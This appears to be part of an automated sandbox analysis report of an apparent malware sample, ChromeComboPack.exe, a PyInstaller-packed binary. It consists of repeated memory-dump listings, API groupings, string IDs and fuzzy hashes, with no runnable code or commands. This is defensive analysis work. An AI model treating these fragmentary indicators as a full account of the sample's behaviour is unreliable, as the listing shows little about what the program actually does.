                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AD10673B08AC08AE720DF65D4402BC7775FB44BA8BA041B5CE5D67B89DE38D116C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: d3533d9dc536a73865986143b90d72cf7f467817cff5a9e1fc853e7b0dbb7422
                                                                                                                                                                                                                                                • Instruction ID: 56e802f725dfa3376b277a90be79611864b26dfec7d2544f5bd29945f6faf1b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3533d9dc536a73865986143b90d72cf7f467817cff5a9e1fc853e7b0dbb7422
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F115E26B14F428AEB00EF60E8482B873A8FB18758F941E71DB6D427A8DF3CD154C360
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Process$ConsoleCurrentShowThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 242035731-0
                                                                                                                                                                                                                                                • Opcode ID: dc119808c190f3f609372cde833c1319ecd6838c5863d1c5dc0248c8f4992b64
                                                                                                                                                                                                                                                • Instruction ID: 05088b422def5471e62312aad37b1a9deaedd68534ec489bf455ef4b67741845
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc119808c190f3f609372cde833c1319ecd6838c5863d1c5dc0248c8f4992b64
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50F06C26E18783C2EE946B66A44C039E3A5FF88B84F9950B0DA4E13758DE3CE095C730
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Process$ConsoleCurrentShowThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 242035731-0
                                                                                                                                                                                                                                                • Opcode ID: ef1b52002b078da6e4bc146513f63fb1d7b490387893660315a42f1c57b8f302
                                                                                                                                                                                                                                                • Instruction ID: 024606d493bde936841719f95fe6be2c4a49c9052d5ee0dc7ce3e25fff2917b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef1b52002b078da6e4bc146513f63fb1d7b490387893660315a42f1c57b8f302
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92F03022A287C3C2EE546B21A448539A3A5FF88B85FA91070DA4E17F58DE3CE495C734
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                • Opcode ID: cb6cd683017cd20f7b4615a471f7e3160e9b6836ece7df3990300d1a03230fd4
                                                                                                                                                                                                                                                • Instruction ID: b5bd4b111b4d12967765690148035704dc295359a2d6a94c9335d790bc53f883
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb6cd683017cd20f7b4615a471f7e3160e9b6836ece7df3990300d1a03230fd4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC411622A187C242FB64AB25E40D37AA660FB90BA4FA04675FF5C17ADDDE3CD491C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF78C9C9F22
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9CB404: RtlFreeHeap.NTDLL(?,?,?,00007FF78C9D3F32,?,?,?,00007FF78C9D3F6F,?,?,00000000,00007FF78C9D4435,?,?,?,00007FF78C9D4367), ref: 00007FF78C9CB41A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9CB404: GetLastError.KERNEL32(?,?,?,00007FF78C9D3F32,?,?,?,00007FF78C9D3F6F,?,?,00000000,00007FF78C9D4435,?,?,?,00007FF78C9D4367), ref: 00007FF78C9CB424
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF78C9BC105), ref: 00007FF78C9C9F40
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe, xrefs: 00007FF78C9C9F2E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                                • API String ID: 3580290477-3268585188
                                                                                                                                                                                                                                                • Opcode ID: 716fb3d0e6b86e35374ab78206596f0f0c380e94d10f38da80ca70c85c175384
                                                                                                                                                                                                                                                • Instruction ID: 867c48a0298c3b335f3e3762de06f3f13bda249719a0835441eff658e327a176
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 716fb3d0e6b86e35374ab78206596f0f0c380e94d10f38da80ca70c85c175384
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4416F32A08B9285EB14EF25E8400B9A7A4FB45BE4BA54075E94E43B86DF3DE491C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: cb87ea1d99dc886f50d571e7adc08eb5a7dc8047dd93f89a11db01e9e971137a
                                                                                                                                                                                                                                                • Instruction ID: 1de7c7441b2b39176ef49e91bff7c61e2d4787f441b467108aeb5a024c7f4b2b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb87ea1d99dc886f50d571e7adc08eb5a7dc8047dd93f89a11db01e9e971137a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2541B633B18A8185DB60DF25E8443A9B7A4FB94794FA04131EE4D87798DF7CD541CB50
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF78C9B1B4A), ref: 00007FF78C9B2070
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: %s: %s$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 2050909247-3704582800
                                                                                                                                                                                                                                                • Opcode ID: cf9b01a4511ef92980d36f6eaa2bfca0541e126ccd784a3e4475787c2cf8d358
                                                                                                                                                                                                                                                • Instruction ID: 743f57c1ad8649686ef6168ac0e01254090d081bc6d82a4c95f885b2bcb188b5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf9b01a4511ef92980d36f6eaa2bfca0541e126ccd784a3e4475787c2cf8d358
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34213563B186D155E720A761B8406F6A294BF88BD4F900171FE8D63B89EE3CD142C210
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                • Opcode ID: 8dc676d833497c624d656039439a36a4b43826c3c7b138b4c54fe0ebad1123f1
                                                                                                                                                                                                                                                • Instruction ID: a2cf5743bd70cba14936058e5618d072cf68595774f31079e212fb665f05b990
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dc676d833497c624d656039439a36a4b43826c3c7b138b4c54fe0ebad1123f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21D232A086C181EB24AB11E44C27DB3A5FB84B84FE580B5D78D53689CF7DE985C7A0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF78C9B1B79), ref: 00007FF78C9B1E9E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: ERROR$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-3005936843
                                                                                                                                                                                                                                                • Opcode ID: 62cbc377ad39f0f57ac113c1b5e744fc407643feec6e9a2503ac327b26b25e1c
                                                                                                                                                                                                                                                • Instruction ID: 132a99c1dc224c840c1cf0634f8a65d7ec0a0f3641b8d238861b17c748cc2e06
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62cbc377ad39f0f57ac113c1b5e744fc407643feec6e9a2503ac327b26b25e1c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0811A232A18BC191E620AB51F8856EAB3A4FF847C4F900175FA8D53B59EE7CE155C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF78C9B28DA,FFFFFFFF,00000000,00007FF78C9B3362), ref: 00007FF78C9B218E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: WARNING$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-3752221249
                                                                                                                                                                                                                                                • Opcode ID: 7d68ee11a32ffdc820f588c9092a71756a31bd868f965a857c73b3f1f744551a
                                                                                                                                                                                                                                                • Instruction ID: 923a75f86e60a090ab103da268986e80e8e5f8c5bb64989c83e1e51a96d7dd24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d68ee11a32ffdc820f588c9092a71756a31bd868f965a857c73b3f1f744551a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD11A232A18BC191E620AB51F8856EAB3A4FF847C4F900175FA8D53B59EE7CE155C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 2d92b8b7d521df9494866c30e4ae755c0f7892732a35e9ef4a1741b3f71c7287
                                                                                                                                                                                                                                                • Instruction ID: baa4612ed091d0fc3ab6f3e96669482b7131e49e609ebd35ab4c584648047c14
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d92b8b7d521df9494866c30e4ae755c0f7892732a35e9ef4a1741b3f71c7287
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F911073A618BC182EB619F15E444269B7A4FB88B88FA84270DFCD07B69DF3CD551CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                • Opcode ID: bb470fc7cf78428f0d9dc0079e6dc4031c2c99e910ba5258b42cac156009a768
                                                                                                                                                                                                                                                • Instruction ID: c7817064c02360cdffea23640f00152cfb0eb80e48d824c858c9e75ab8bbc42f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb470fc7cf78428f0d9dc0079e6dc4031c2c99e910ba5258b42cac156009a768
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7018F6291C28286F730BF60A46927EE3A0FF44714FE01076DA4D92689EF3CE544CB24
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressProc$CriticalSection$AllocDeleteFreeHandleInitializeLibraryLoadModule
                                                                                                                                                                                                                                                • String ID: AddAccessAllowedAce$AddAccessAllowedAceEx$AddAccessAllowedObjectAce$AddAccessDeniedAce$AddAccessDeniedAceEx$AddAccessDeniedObjectAce$AddAuditAccessAceEx$AddAuditAccessObjectAce$AddMandatoryAce$AdvAPI32.dll$SetSecurityDescriptorControl
                                                                                                                                                                                                                                                • API String ID: 3842108915-2689366622
                                                                                                                                                                                                                                                • Opcode ID: 00abef228cb45286ba7f1125ddbe3760151564b421905c27eb664f72b636958c
                                                                                                                                                                                                                                                • Instruction ID: 65d2d8655a6c2ad637ecac17d54a589070f0e8d0fe847a879dccb5ceeeb939d1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00abef228cb45286ba7f1125ddbe3760151564b421905c27eb664f72b636958c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75515426B0AB06A5EA8D9B15FCA41743BA0BF48B91F5550BAD84E52364EF3CF489C304
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                                                • Opcode ID: 70f854044df5acb2ce3175ee53db70c69d323c809d2866dc920b2ba8ef5ec66e
                                                                                                                                                                                                                                                • Instruction ID: bf948e4a4afe0e6f316a7f98af83d623fd8e055d96d08e9bc1c6b0e270c0e32f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70f854044df5acb2ce3175ee53db70c69d323c809d2866dc920b2ba8ef5ec66e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2981BC23F1E303A6FA58AF65D5602B92E91BF45B80F9C44B5D94D433D6EE7CE851C600
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
